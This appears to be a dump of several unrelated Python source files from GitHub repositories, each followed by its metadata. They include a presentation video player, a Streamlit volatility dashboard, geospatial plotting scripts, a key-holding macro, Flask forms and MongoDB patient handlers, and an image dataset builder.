|
6
|
16462145161
|
import cv2
import numpy as np
# np.set_printoptions(threshold=np.inf)
import time
from collections import deque
import threading
# Low Quality
# PAUSE_INDICATOR = (-1, 0)
# RESOLUTION = "480p15"
# FPS = 15
# Production quality
PAUSE_INDICATOR = (-1, 0)
RESOLUTION = "1440p60"
FPS = 60
cv2.namedWindow("Frame", 0);
cv2.resizeWindow("Frame", 2560, 1440)
cv2.namedWindow("Frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("Frame",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)
scenes = [
"TitleScreen",
"Outline",
"Newton",
"SchrodingerEquation",
"HarmonicOscillator",
"VMC",
"WhatToGuess",
"PsiDesign",
"NewIdea",
"NetworkDisplay",
"QDResults",
"HeliumResults",
"Conclusions",
"FutureProspects",
"ThankYou",
]
scenes = [
("media/videos/presentation/{}/" + s + ".mp4").format(RESOLUTION) for s in scenes
]
class Manager:
def __init__(self, scenes):
self.scenes = scenes
self.active_scene = cv2.VideoCapture(self.scenes[0])
self.forward = deque()
self.current_scene = 0
self.frame = 0
self.lock = threading.Lock()
self.last_scene = len(scenes) - 1
self.keep_running = True
def stop(self):
self.lock.acquire()
self.keep_running = False
self.active_scene.release()
self.lock.release()
def run(self):
while self.keep_running:
self.lock.acquire()
if len(self.forward) >= FPS:
self.lock.release()
time.sleep(1 / FPS / 5)
continue
if not self.active_scene.isOpened():
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
if self.active_scene.isOpened():
ret, frame = self.active_scene.read()
if ret:
self.forward.append(frame)
else:
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(
self.scenes[self.current_scene]
)
self.lock.release()
def next_frame(self):
self.lock.acquire()
frame = self.forward.popleft() if self.forward else None
self.lock.release()
return frame
def play(self):
paused = False
indicator_present = False
t0 = 0
while True:
t1 = time.time()
wait_time = max(1, int(900 * (1 / FPS - (t1 - t0)))) * int(not paused)
key = cv2.waitKey(wait_time) & 0xFF
if key == ord("q"):
self.stop()
break
elif key == ord(" "):
paused = not paused
continue
elif key == 83:
for _ in range(FPS // 2):
frame = self.next_frame()
if frame is not None:
cv2.imshow("Frame", frame)
elif key == 81:
self.active_scene.release()
self.current_scene = max(0, self.current_scene - 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
paused = False
elif key == ord('n'):
self.active_scene.release()
self.current_scene = min(self.last_scene, self.current_scene + 1)
self.active_scene = cv2.VideoCapture(self.scenes[self.current_scene])
paused = False
elif key != 0xFF:
print("\rUnknown key pressed:", key)
print(f"{1 / (t1 - t0):.2f}", end="\r")
if not paused:
frame = self.next_frame()
if frame is not None:
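                # PAUSE_INDICATOR = (-1, 0) addresses the bottom-left pixel of
                # the BGR frame; (0, 0, >=224) is a near-pure red dot rendered
                # into the video, and pausing triggers on its falling edge
                # (dot present in the previous frame, gone in this one).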
ind_pres = (
frame[PAUSE_INDICATOR][0] == 0
and frame[PAUSE_INDICATOR][1] == 0
and frame[PAUSE_INDICATOR][2] >= 224
)
if indicator_present and not ind_pres:
paused = True
indicator_present = ind_pres
cv2.imshow("Frame", frame)
t0 = t1
if __name__ == "__main__":
manager = Manager(scenes)
load_thread = threading.Thread(target=manager.run)
load_thread.start()
manager.play()
cv2.destroyAllWindows()
# i = 0
# paused = False
# direction = 1
# prev, prev_stop_frame, t0 = 0, 0, 0
# while True:
# frame = frames[i]
# cv2.imshow("Frame", frame)
# delta = time.time() - t0
# wait_time = max(1, int(1000 * (1 / FPS - delta))) * int(not paused)
# key = cv2.waitKey(wait_time) & 0xFF
# if key == ord(" "):
# paused = not paused
# prev_stop_frame = i
# elif key == 81:
# i = max(0, i - FPS // 2)
# elif key == 85:
# i = min(len(frames - 1), i + FPS // 2)
# elif key == ord("q"):
# break
# elif key == ord("h"):
# direction = -1
# elif key == ord("l"):
# direction = 1
# elif (
# not paused
# and abs(i - prev_stop_frame) > FPS_SOURCE / 2
# and np.all(frame == prev)
# and False
# ):
# paused = True
# prev_stop_frame = i
# prev = frame
# t0 = time.time()
# i = max(0, min(len(frames) - 1, i + direction))
|
bsamseth/masters-presentation
|
player.py
|
player.py
|
py
| 5,552 |
python
|
en
|
code
| 2 |
github-code
|
6
|
2799581400
|
import streamlit as st
import pandas_ta as ta
import pandas as pd
import yfinance as yf
import numpy as np
st.title("Volatility Dashboard")
st.sidebar.title("selection")
option = st.sidebar.selectbox("options",('long signal', 'short signal', 'data frame', 'Important dates', 'implinks'))
st.subheader(option)
df = yf.download('BTC-USD', period='6mo', interval='1h')
df = df.reset_index()
# After reset_index, intraday data yields a 'Datetime' column; the rename
# below is only a fallback in case the index comes back named 'index'
df = df.rename(columns={'index': 'Date'})
df['Volatility Open'] = df['Open'].rolling(window=10).std()
df['Volatility High'] = df['High'].rolling(window=10).std()
df['Volatility Low'] = df['Low'].rolling(window=10).std()
df['Volatility Close'] = df['Close'].rolling(window=10).std()
newdf=df[['Datetime','Volatility Open','Volatility High','Volatility Low','Volatility Close']]
newdf=newdf.set_index('Datetime')
newdf=newdf.dropna()
newdf = newdf.rename_axis('Date')
newdf.index = pd.to_datetime(newdf.index)
newdf.index = newdf.index.tz_localize(None)
f = pd.read_csv('https://raw.githubusercontent.com/suparn2304/volatility-dashboard/main/vol1%20harmonic.csv', index_col=0)
f = f.rename_axis('Date')
f.index = pd.to_datetime(f.index)
f = f.rename(columns={'0.0000000': 'forier'})
new_dates = pd.date_range(start=newdf.index.min(), end='2023-05-23 10:00:00', freq='1h')
updated_index = newdf.index.append(new_dates)
newdf = newdf[~newdf.index.duplicated(keep='first')]
newdf = newdf.reindex(updated_index)
newdf.index = pd.to_datetime(newdf.index)
merged_df = pd.merge(newdf, f, how='left', left_index=True, right_index=True)
merged_df.index = pd.to_datetime(merged_df.index)  # infer_datetime_format is deprecated and now the default
merged_df = merged_df.rename(columns={'Volatility Open': 'Open', 'Volatility Close': 'Close', 'Volatility High': 'High', 'Volatility Low': 'Low'})
merged_df = merged_df.ffill()  # fillna(method='ffill') is deprecated in recent pandas
merged_df = merged_df[~merged_df.index.duplicated(keep='first')]
merged_df['fut1'] = merged_df['forier'].shift(-1)
merged_df['fut2'] = merged_df['forier'].shift(-2)
merged_df['fut3'] = merged_df['forier'].shift(-3)
merged_df['fut4'] = merged_df['forier'].shift(-4)
merged_df['fut5'] = merged_df['forier'].shift(-5)
merged_df['zscore'] = ta.zscore(merged_df['Close'], length=20, std=1)
merged_df = merged_df.rename_axis('Date')
merged_df['forier_plot'] = merged_df['forier']*100
entry_points = pd.DataFrame(columns=['Date', 'Entry_Price'])
# Set the threshold for the z-score
zscore_threshold = -0.7999
# Loop through the rows in the DataFrame
for i in range(len(merged_df)):
# Check if the conditions are met for entering a trade
if (merged_df.iloc[i].fut3 > merged_df.iloc[i].fut2 > merged_df.iloc[i].fut1) and \
(merged_df.iloc[i].zscore > zscore_threshold) and \
(merged_df.iloc[i-1].zscore < zscore_threshold):
# Record the entry point
        entry_points = pd.concat(
            [entry_points, pd.DataFrame([{'Date': merged_df.iloc[i].name,
                                          'Entry_Price': merged_df.iloc[i].Close}])],
            ignore_index=True)  # DataFrame.append was removed in pandas 2.0
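# A vectorized sketch of the same entry rule (assumes the merged_df built
# above); boolean masks replace the row-by-row loop, and shift(1) also avoids
# the iloc[i-1] wrap-around at row 0:
#
#   rising = (merged_df.fut3 > merged_df.fut2) & (merged_df.fut2 > merged_df.fut1)
#   crossed_up = (merged_df.zscore > zscore_threshold) & \
#                (merged_df.zscore.shift(1) < zscore_threshold)
#   entries = merged_df.loc[rising & crossed_up, 'Close']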
ohlc_df = pd.DataFrame()
ohlc_df.index = merged_df.index
ohlc_df['Open'] = merged_df['Open']
ohlc_df['High'] = merged_df['High']
ohlc_df['Low'] = merged_df['Low']
ohlc_df['Close'] = merged_df['Close']
if option == 'data frame':
st.dataframe(ohlc_df)
df_callendar = pd.read_csv('https://raw.githubusercontent.com/suparn2304/volatility-dashboard/main/calendar-event-list.csv', index_col=0)
df_callendar.index = pd.to_datetime(df_callendar.index)
calllendar_df = pd.merge(ohlc_df, df_callendar, how='left', left_index=True, right_index=True)
calllendar_df = calllendar_df.dropna()
if option == 'Important dates':
st.dataframe(df_callendar)
import plotly.graph_objects as go
fig = go.Figure(data=[go.Candlestick(
x = ohlc_df.index,
open = ohlc_df.Open,
high = ohlc_df.High,
low = ohlc_df.Low,
close = ohlc_df.Close
)])
fig.add_trace(go.Scatter(
x=entry_points.Date,
y=entry_points.Entry_Price,
mode= "markers",
marker_symbol="diamond-dot",
marker_size = 13,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(0,255,0,0.7)",
))
fig.add_trace(go.Scatter(
x=calllendar_df.index,
y=calllendar_df.Close,
mode= "markers",
marker_symbol="x",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.update_layout (xaxis_rangeslider_visible=False)
if option == 'long signal':
st.plotly_chart(fig)
st.dataframe(entry_points)
entry_points_short = pd.DataFrame(columns=['Date', 'Entry_Price'])
# Set the threshold for the z-score
zscore_threshold = 0.7999
# Loop through the rows in the DataFrame
for i in range(len(merged_df)):
# Check if the conditions are met for entering a trade
if (merged_df.iloc[i].fut3 < merged_df.iloc[i].fut2 < merged_df.iloc[i].fut1) and \
(merged_df.iloc[i].zscore < zscore_threshold) and \
(merged_df.iloc[i-1].zscore > zscore_threshold):
# Record the entry point
        entry_points_short = pd.concat(
            [entry_points_short, pd.DataFrame([{'Date': merged_df.iloc[i].name,
                                                'Entry_Price': merged_df.iloc[i].Close}])],
            ignore_index=True)  # DataFrame.append was removed in pandas 2.0
import plotly.graph_objects as go
fig = go.Figure(data=[go.Candlestick(
x = ohlc_df.index,
open = ohlc_df.Open,
high = ohlc_df.High,
low = ohlc_df.Low,
close = ohlc_df.Close
)])
fig.add_trace(go.Scatter(
x=entry_points_short.Date,
y=entry_points_short.Entry_Price,
mode= "markers",
marker_symbol="diamond-dot",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.add_trace(go.Scatter(
x=calllendar_df.index,
y=calllendar_df.Close,
mode= "markers",
marker_symbol="x",
marker_size = 10,
marker_line_width = 2,
marker_line_color= "rgba(0, 0, 0, 0.7)",
marker_color="rgba(205, 13, 0, 1)",
))
fig.update_layout (xaxis_rangeslider_visible=False)
if option == 'short signal':
st.plotly_chart(fig)
st.dataframe(entry_points_short)
if option == 'implinks':
st.write("gmx top trader account [link](https://www.gmx.house/arbitrum/account/0x48202a51c0d5d81b3ebed55016408a0e0a0afaae)")
st.write("gmx top trader account 2 [link](https://www.gmx.house/arbitrum/account/0xe8c19db00287e3536075114b2576c70773e039bd)")
st.write("bookmap [link](https://web.bookmap.com/?duration=10m)")
st.write("tradinglite [link](https://www.tradinglite.com/)")
|
carolinedlu/volatility-dashboard
|
dashboard.py
|
dashboard.py
|
py
| 7,458 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29699780347
|
import pandas as pd
import numpy as np
import geopandas as gpd
import matplotlib.pyplot as plt
from scipy import ndimage
import geoplot
import matplotlib.pylab as pylab
# import geoplot as gp
from models import Simulation, NTAGraphNode, DiseaseModel
def read_hospital_data(filename):
df = pd.read_csv(filename, sep=",", header=None, encoding="ISO-8859-1")
# Remove extraneous commas/columns after last column
df = df.drop([1, 2, 3, 4], axis=1)
df.columns = [
"name",
"lat",
"long",
"bed_count",
]
df["lat"] = df.lat.astype(float)
df["long"] = df.long.astype(float)
return df
def read_nta_data(filename):
df = pd.read_csv(filename, sep=",", header=None, encoding="ISO-8859-1")
# Remove extraneous commas/columns after last column
df = df.loc[:, :6]
# Rename columns to use for indexing
df.columns = [
"borough",
"nta_code",
"nta_name",
"population",
"lat",
"long",
"hospitalization_rate",
]
df["lat"] = df.lat.astype(float)
df["long"] = df.long.astype(float)
df["hospitalization_rate"] = df.hospitalization_rate.astype(float)
return df
def write_parsed_data(df, filename):
with open(filename, "w") as f:
for row in df.itertuples(index=False, name=None):
f.write("{}\n".format(row))
def show_kdeplot(shape, gdf):
ax = geoplot.polyplot(shape, projection=geoplot.crs.AlbersEqualArea(), zorder=1)
geoplot.kdeplot(
gdf,
ax=ax,
shade=True,
cmap="Reds",
n_levels=16,
shade_lowest=True,
clip=shape.simplify(0.001, preserve_topology=False),
)
geoplot.pointplot(gdf, ax=ax, color="blue")
plt.show()
NTAs = read_nta_data("New York Pop NTA updated.csv")
hospitals = read_hospital_data("NYC Hospital Locations Filled.csv")
zipfile = "zip:///home/kevin/code/Comp-Epi-Project/shape/shapefile.zip"
shape = gpd.read_file(zipfile)
gdf = gpd.GeoDataFrame(
hospitals,
geometry=gpd.points_from_xy(hospitals["long"], hospitals["lat"]),
crs="epsg:4326",
)
gdf2 = gpd.GeoDataFrame(
NTAs, geometry=gpd.points_from_xy(NTAs["long"], NTAs["lat"]), crs="epsg:4326",
)
##################
# choropleth WIP #
##################
NTAs_d = dict(gdf2)
shape_d = dict(shape)
for i, ntacode in NTAs_d["nta_code"].items():
indexes = [k for k, v in shape_d["ntacode"].items() if ntacode == v]
if indexes:
assert len(indexes) == 1
index = indexes.pop()
NTAs_d["geometry"][i] = shape_d["geometry"][index]
else:
print(ntacode, shape_d["ntaname"][i])
new_NTAs = pd.DataFrame(NTAs_d)
gdf3 = gpd.GeoDataFrame(new_NTAs, geometry=new_NTAs.geometry)
print(gdf3.head(100))
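# Equivalent sketch (assumption: 'nta_code' in NTAs matches 'ntacode' in the
# shapefile) using an attribute merge instead of the manual dict scan above:
#
#   merged = NTAs.merge(shape[["ntacode", "geometry"]],
#                       left_on="nta_code", right_on="ntacode", how="left")
#   gdf3_alt = gpd.GeoDataFrame(merged, geometry="geometry")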
# show_kdeplot(shape, gdf)
geoplot.choropleth(
gdf3,
projection=geoplot.crs.AlbersEqualArea(),
hue="hospitalization_rate",
cmap="Greens",
legend=True,
edgecolor="black",
linewidth=1,
)
plt.show()
|
cwaldron97/Comp-Epi-Project
|
hospitals.py
|
hospitals.py
|
py
| 2,990 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30217438684
|
import seaborn as sns
import matplotlib.pyplot as plt
#%matplotlib inline
tips = sns.load_dataset('tips')
fluege = sns.load_dataset('flights')
###Matrix plots###
#Heatmap
#For the heatmap to work well, your data should already be in matrix form. sns.heatmap() then handles colouring those data
# matrix of the correlation data
tips.corr() #corr automatically detects numeric columns and skips categorical ones.
sns.heatmap(tips.corr()) #draw the heatmap from the correlation matrix
plt.show()
sns.heatmap(tips.corr(),cmap='coolwarm',annot=True) # cmap: colour scheme, annot: write the correlation value in each cell
plt.show()
#Build a pivot table to display the data by year
pvfluege = fluege.pivot_table(values='passengers',index='month',columns='year') #values: passenger counts; index: the rows, columns: the columns
sns.heatmap(pvfluege,cmap='magma',linecolor='white',linewidths=1) # linecolor: separates the cells; linewidths: sets the line width.
plt.show()
#Clustermap: which categories (e.g. months with similar traffic) lie close together
sns.clustermap(pvfluege,cmap='coolwarm',standard_scale=1) # standard_scale: standardise along the row or column dimension (subtract the minimum from every value, then divide every value by the maximum)
plt.show() # use 0 to standardise rows and 1 for columns.
#Regression plots:
sns.lmplot(x="total_bill",y="tip", data=tips) # compare bill with tip for correlation
plt.show()
sns.lmplot(x='total_bill',y='tip',data=tips,hue='sex',palette='coolwarm',#hue: split by a categorical parameter
markers=['o','v'], #change the marker symbols
scatter_kws={'s':100}) #scatter_kws: sets the marker size
plt.show()
sns.lmplot(x='total_bill',y='tip',data=tips, row='time', col='sex') #row & col allow building multiple correlation plots.
plt.show()
|
ThePeziBear/MyPythonLibrary
|
Visualizing_Python/Seaborn/2_matrix_regression_function_seaborn.py
|
2_matrix_regression_function_seaborn.py
|
py
| 2,082 |
python
|
de
|
code
| 0 |
github-code
|
6
|
4357761100
|
from flask_wtf import Form
from wtforms import StringField, TextAreaField, SelectField
from wtforms import SubmitField, validators
# from wtforms.ext.sqlalchemy.fields import QuerySelectField
from ..models import Department, Service
class RequestForm(Form):
'''This class creates an RequestForm
object.
'''
name = StringField('Request',
[validators.Required(message='We need an Request.'),
validators.Length(
max=70,
message='Your \subject is a tad long.'
)
]
)
description = TextAreaField('Request Description',
[validators.required(
message='Please describe your Request.')])
priority = SelectField('Priority', choices=[
('high', 'High'), ('medium', 'Medium'), ('low', 'Low')])
department = SelectField('Department',
[validators.Required(
message='Department required.')],
coerce=int)
service = SelectField('Service',
[validators.Required(
message='Service required.')],
coerce=int)
submit = SubmitField('Post Request')
def __init__(self, *args, **kwargs):
super(RequestForm, self).__init__(*args, **kwargs)
self.department.choices = [
(dept.id, dept.name) for dept in Department.query.all()]
self.service.choices = [
(service.id, service.name) for service in Service.query.all()]
class CommentForm(Form):
'''This class creates a CommentForm
object
'''
comment = TextAreaField('Comment')
|
bazanovam/smartIT
|
app/request/forms.py
|
forms.py
|
py
| 1,819 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71602794748
|
#
#
# Key-Holding-Macro made by JngVedere
# Github : https://github.com/JngVedere
# version 0.1.0 - Released on 03-06-2023
#
#
from tkinter import messagebox, ttk
from tendo import singleton
try:
singleton.SingleInstance()
except SystemExit as e:
messagebox.showerror("ERROR", e)
import tkinter as tk
import pywinauto, XK_TO_DD
import threading
from time import sleep
try:
from KeyHolding import KeyToWindow, getKeyPressing
from KeyHolding import wnd_check_thread
except SystemExit as e:
messagebox.showerror("ERROR",e)
exit(0)
# // Global variables
root:object = tk.Tk()
app:object
app_title:str = "Key Holding Macro"
app_size:tuple = (350,170)
window_info:str = ""
simplified:bool = True
# // GUI
class MainApp:
def __init__(self, master):
global simplified
# Basic Variables
self.master = master
self.key_pressed = False
self.key_to_send = -1
#Frame
self.master.title(app_title)
self.X = int(self.master.winfo_screenwidth()/2 - app_size[0]/2)
self.Y = int(self.master.winfo_screenheight()/2 - app_size[1]/2)
self.master.wm_geometry(f"{app_size[0]}x{app_size[1]}+{self.X}+{self.Y}")
self.master.minsize(250, 150)
self.master.maxsize(700, 220)
self.master.resizable(True,False)
self.master.bind("<Key>", self.key_press)
self.upper_frame = tk.Frame(width=100, relief="sunken",bd=1)
self.upper_frame.pack(side="top",fill="both",padx=5,ipadx=2,pady=5,ipady=2)
self.lower_frame = tk.Frame(width=100, height=110, relief="sunken",bd=1)
self.lower_frame.pack(side="bottom",fill="both",padx=5,ipadx=2,pady=5,ipady=2,expand=True)
self.window_combobox = ttk.Combobox(self.upper_frame, width = 40, postcommand = lambda:self.update_cb_list(simplified), state='readonly')
self.window_combobox.set("Pick a Window")
self.window_combobox.pack(fill="x",padx=3,pady=3,side="top")
self.window_combobox.bind("<<ComboboxSelected>>",self.window_selected)
self.check_var = tk.BooleanVar(value=True)
self.simplified_checkbutton = tk.Checkbutton(self.upper_frame, text='Simplified Window', variable=self.check_var, onvalue=True, offvalue=False, command=self.on_check_button_click)
# self.simplified_checkbutton.bind("<ButtonRelease-1>",self.on_check_button_click)
self.simplified_checkbutton.pack(pady=2)
print(self.check_var.get())
self.show_key = tk.Label(self.lower_frame, text="<Press any key to hold>", bg='gray19', fg='snow')
self.show_key.pack(pady=5)
self.send_button = tk.Button(self.lower_frame, text="Hold Key", command=self.button_pressed, takefocus=False)
self.send_button.pack(pady=3)
self.ro_textbox = ttk.Label(self.lower_frame, text='',border=1,font=("Calibri",12,"bold"))
self.ro_textbox.pack(side="bottom")
def update_cb_list(self, simplified):
print("updt cb list", simplified)
if simplified == True: # Find window by window name
self.temp_list = pywinauto.Desktop(backend='uia').windows(title_re ='.')
self.values_list = [w.window_text() for w in self.temp_list]
else: # Find window by hwnd
self.values_list = []
self.hwnd_list = []
procs = pywinauto.findwindows.find_elements()
for proc in procs:
self.hwnd_list.append(proc.handle)
self.values_list.append((proc.name,proc.class_name))
self.window_combobox['value'] = self.values_list
def on_check_button_click(self):
        def update_check_var():  # deferred via after() so a single click doesn't trigger two updates
print("Button Clicked")
global simplified
simplified = self.check_var.get()
self.window_combobox.set("Pick a Window")
print(self.check_var.get())
self.master.after(30, update_check_var)
def window_selected(self, event):
global window_info
if simplified == True:
window_info = self.window_combobox.get()
elif simplified == False:
window_info = self.hwnd_list[self.window_combobox.current()]
def key_press(self, event):
if self.key_pressed == False:
self.show_key.config(text=event.keysym)
self.key_to_send = XK_TO_DD.XK_TO_DD[str(event.keycode)]
print(repr(event.char), repr(event.keysym), repr(event.keycode), repr(event.keysym_num))
def button_pressed(self):
global window_info
if self.window_combobox.current() == -1:
messagebox.showerror("ERROR", "Window isn't selected")
return
elif self.key_to_send == -1:
messagebox.showerror("ERROR", "Key isn't selected")
return
if not KeyToWindow.is_valid_window_info(window_info): return
print(window_info)
if not self.key_pressed:
self.activate_button()
else:
self.deactivate_button()
def SafeQuit(self, master:object = root) -> None:
if messagebox.askokcancel(f"{app_title} Quit", f"Are you sure that you want to quit {app_title}?"):
if getKeyPressing() == True:
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=False)
print("Events Listening is stopped!")
master.destroy()
def is_input_activating(self):
if getKeyPressing() == True:
self.ro_textbox.config(text='Activating')
else:
self.ro_textbox.config(text='Not Activating')
self.is_hwnd_available()
def is_hwnd_available(self):
global window_info
if not KeyToWindow.is_valid_window_info(window_info):
self.deactivate_button()
def activate_button(self):
global window_info
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=True)
self.key_pressed = True
wnd_check_thread.resume()
key_check_thread.resume()
self.window_combobox.config(state='disabled')
self.simplified_checkbutton.config(state='disabled')
self.ro_textbox.config(text='')
self.send_button.config(text="Release Key")
def deactivate_button(self):
global window_info
KeyToWindow.send_key_to_window(window_info, self.key_to_send, key_down=False)
self.key_pressed = False
wnd_check_thread.pause()
key_check_thread.pause()
self.window_combobox.config(state='normal')
self.simplified_checkbutton.config(state='normal')
self.ro_textbox.config(text='')
self.send_button.config(text="Hold Key")
#// Logics Threading
class MyThread(threading.Thread):
def __init__(self):
super().__init__()
self.pause_event = threading.Event()
self.pause_event.clear()
self.daemon = True
def run(self):
# while not self.pause_event.is_set():
while True:
self.pause_event.wait()
app.is_input_activating()
# Wait for a short time before checking again
sleep(0.1)
def pause(self):
self.pause_event.clear()
def resume(self):
self.pause_event.set()
if __name__ == "__main__":
app = MainApp(root)
key_check_thread = MyThread()
key_check_thread.start()
root.protocol("WM_DELETE_WINDOW", app.SafeQuit)
root.mainloop()
|
JngVedere/Key-Holding-Macro
|
main.py
|
main.py
|
py
| 7,540 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22218753276
|
from director import lcmUtils
from director import transformUtils
import PythonQt
import bot_core as lcmbotcore
from director.simpletimer import SimpleTimer
import numpy as np
class StateListener(object):
def __init__(self):
self.subscriber = None
self.transforms = []
self.timer = SimpleTimer()
self.paused = True
def onBDIPose(self, m):
t = transformUtils.transformFromPose(m.pos, m.orientation)
if self.timer.elapsed() > 1.0:
self.transforms.append((self.timer.now(), t))
self.timer.reset()
def describe(self):
print('----------')
print('%d transforms' % len(self.transforms))
if not self.transforms:
return
time0, transform0 = self.transforms[0]
o0 = np.array(transform0.GetOrientation())
p0 = np.array(transform0.GetPosition())
for timeN, transformN in self.transforms:
oN = np.array(transformN.GetOrientation())
pN = np.array(transformN.GetPosition())
oD = oN - o0
pD = pN - p0
print('%.2f: [%.3f, %.3f, %.3f] [%.3f, %.3f, %.3f] ' % ((timeN - time0), oD[0], oD[1], oD[2], pD[0], pD[1], pD[2]))
def init(self):
self.subscriber = lcmUtils.addSubscriber('POSE_BODY', lcmbotcore.pose_t, self.onBDIPose)
listener = StateListener()
listener.init()
|
RobotLocomotion/director
|
src/python/director/statelistener.py
|
statelistener.py
|
py
| 1,387 |
python
|
en
|
code
| 176 |
github-code
|
6
|
35073881294
|
# helper functions
def format_show_info(show):
empty_placeholder = "—"
star_emoji = "★"
empty_star_emoji = "☆"
text = "_{name} ({start} - {end})_\
\nRating: {rating}\
\nGenres: _{genres}_\
\nRuntime: _{runtime}_\
\nStatus: _{status}_"
name = getattr(show, "name", None)
start = getattr(show, "premiered", None)
end = getattr(getattr(show, "previous_episode", None), "airdate", None)
rating = getattr(show, "rating", {}).get("average")
genres = getattr(show, "genres", None)
runtime = getattr(show, "runtime", None)
status = getattr(show, "status", None)
    # some of these could've been done with the getattr call,
    # but None is an acceptable return value for getattr
name = name if name else empty_placeholder
start = start[:4] if start else ""
genres = ", ".join(genres) if genres else empty_placeholder
runtime = str(runtime) + " minutes" if runtime else empty_placeholder
status = status if status else empty_placeholder
# only show end if show has ended
if status == "Ended":
end = end[:4]
else:
end = ""
# star rating out of five
if rating:
r = int(rating)//2
rating = star_emoji * r + empty_star_emoji * (5-r)
else:
rating = empty_placeholder
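    # e.g. rating 7.3 -> int(7.3)//2 = 3 -> "★★★☆☆"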
formatted_text = text.format(
name=name,
start=start,
end=end,
rating=rating,
genres=genres,
runtime=runtime,
status=status
)
return formatted_text
|
devanjith/tvtimebot
|
helpers/util.py
|
util.py
|
py
| 1,599 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42667622123
|
from models import db
from flask import Flask, request, jsonify
from bson.json_util import dumps
def getPacientes():
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
retorno = dumps(pacientes.find({}))
return jsonify(retorno)
finally:
con.close()
        print('connection closed')
def getListPaciente(parametro='documento'):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
retorno = list(pacientes.find({}))
lista = [d[parametro] for d in retorno]
return jsonify({'data': lista, 'status': 200})
finally:
con.close()
        print('connection closed')
def createPatient(data):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
        pacientes.insert_one(data)  # insert() was removed in PyMongo 3+
return jsonify({'message': 'paciente insertado', 'status': 200})
except:
return jsonify({'message': 'fallo en la insercion', 'status': 500})
finally:
con.close()
        print('connection closed')
def deletePatientDocument(documento):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
pacientes.delete_many({'documento': documento})
return jsonify({'message': 'paciente eliminado', 'status': 200})
except:
return jsonify({'message': 'fallo al eliminar paciente', 'status': 500})
finally:
con.close()
        print('connection closed')
def editarPaciente(data):
con = db.get_connection()
dbejercicios = con.ModeloEjercicios
try:
pacientes = dbejercicios.pacientes
print(data['data'])
pacientes.find_one_and_update({'documento': data['documento']}, {'$set': data['data']})
return jsonify({'message': 'paciente editado', 'status': 200})
except:
return jsonify({'message': 'fallo al editar un paciente', 'status': 500})
finally:
con.close()
        print('connection closed')
|
andres94091/projectEjerciciosBackend
|
models/pacientes.py
|
pacientes.py
|
py
| 2,139 |
python
|
es
|
code
| 0 |
github-code
|
6
|
42727324036
|
import os
import csv
import numpy as np
import sys
from PIL import Image
class DataBuilder:
def __init__(self, image_dir, label_file, output_dir,output_file, output_label_file, target_size):
self.image_dir = image_dir
self.label_file = label_file
self.target_size = target_size
self.filtered_labels = []
self.output_file = output_file
self.output_label_file = output_label_file
self.output_dir = output_dir
self.labels = []
def filter_labels(self, labels_to_ignore):
# Load the labels from the CSV file and filter out the labels to ignore
with open(self.label_file, 'r') as file:
reader = csv.reader(file)
labels = [row for row in reader]
self.filtered_labels = [label for label in labels if label[2] not in labels_to_ignore]
def process_images(self):
# Create output directory if it doesn't exist
os.makedirs(self.output_dir, exist_ok=True)
# Open the output CSV file
with open(self.output_file, 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
# Iterate through the images in the directory
for image_file in os.listdir(self.image_dir):
if image_file.endswith('.jpg') or image_file.endswith('.png'):
image_path = os.path.join(self.image_dir, image_file)
label = self.get_label(image_file)
                    if label is not None:
self.labels.append(label)
# Load, resize, and convert the image to an array of target size and three channels
image = Image.open(image_path)
image = image.resize(self.target_size)
image_array = np.array(image.convert('RGB'))
# Flatten the image array and append the label
flattened_image = image_array.flatten()
#row = np.concatenate(([label], flattened_image))
# Write the row to the CSV file
writer.writerow(flattened_image)
self.store_labels()
def get_index(self, image_file):
for i in range(len(self.filtered_labels)):
if image_file in self.filtered_labels[i][1]:
return i
return None
def get_label(self, image_file):
# Extract the label from the image file name or file itself
# and return the corresponding label
#We should search for labels ("sad" or "happy") appearing in the image file path (exact match not needed)
#If one of the labels is found, and the third column matches it (i.e. "sad or happy"), then we return the label (0 or 1)
#If no label is found, we return None, which means the image should be ignored
ind = self.get_index(image_file)
if ind is None:
print(f"Image {image_file} not found in labels")
return None
if 'sad' in self.filtered_labels[ind][1] and self.filtered_labels[ind][2] == 'sad':
return 0
elif 'happy' in self.filtered_labels[ind][1] and self.filtered_labels[ind][2] == 'happy':
return 1
else:
print(f"Image {image_file} not found in labels")
return None
def store_labels(self):
# Store the label in a separate file (e.g., CSV or text file)
# Implement your own logic here based on your desired output format
with open(self.output_label_file, 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
for label in self.labels:
                writer.writerow([label])  # writerow expects a sequence; a bare string would be split per character
# Example usage
builder = DataBuilder(
image_dir='./images',
label_file='./labels/labels.csv',
output_dir='./output',
output_file='./output/output.csv',
output_label_file='./output/output_labels.csv',
target_size=(64, 64) # Example target size, adjust according to your needs
)
# Filter out labels to ignore
labels_to_ignore = ['surprise', 'anger', 'disgust', 'contempt', 'fear', 'neutral'] # Example labels to ignore
builder.filter_labels(labels_to_ignore)
#print(builder.filtered_labels)
#sys.exit()
# Process the images
builder.process_images()
|
maximiliann97/TIF360-project-GIF-emotion-flipper
